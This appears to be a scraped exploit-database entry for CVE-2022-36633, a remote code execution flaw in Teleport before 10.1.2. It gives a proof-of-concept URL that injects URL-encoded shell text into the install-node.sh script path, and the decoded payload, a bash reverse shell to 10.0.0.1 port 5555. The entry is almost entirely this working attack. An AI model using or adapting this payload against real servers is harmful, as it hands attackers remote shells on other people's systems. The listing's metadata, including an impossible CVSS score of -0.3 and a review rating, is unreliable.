Exploit for Teleport 10.1.1 Remote Code Execution CVE-2022-36633

Name: Exploit for Teleport 10.1.1 Remote Code Execution CVE-2022-36633
Rating: 5 (229 reviews)

2022-09-23 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:168477
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)  
# Date: 08/01/2022  
# Exploit Author: Brandon Roach & Brian Landrum  
# Vendor Homepage: https://goteleport.com  
# Software Link: https://github.com/gravitational/teleport  
# Version: < 10.1.2  
# Tested on: Linux  
# CVE: CVE-2022-36633  
  
Proof of Concept (payload):  
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=  
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=  
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=  
method=3Diam  
  
  
Decoded payload:  
"  
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #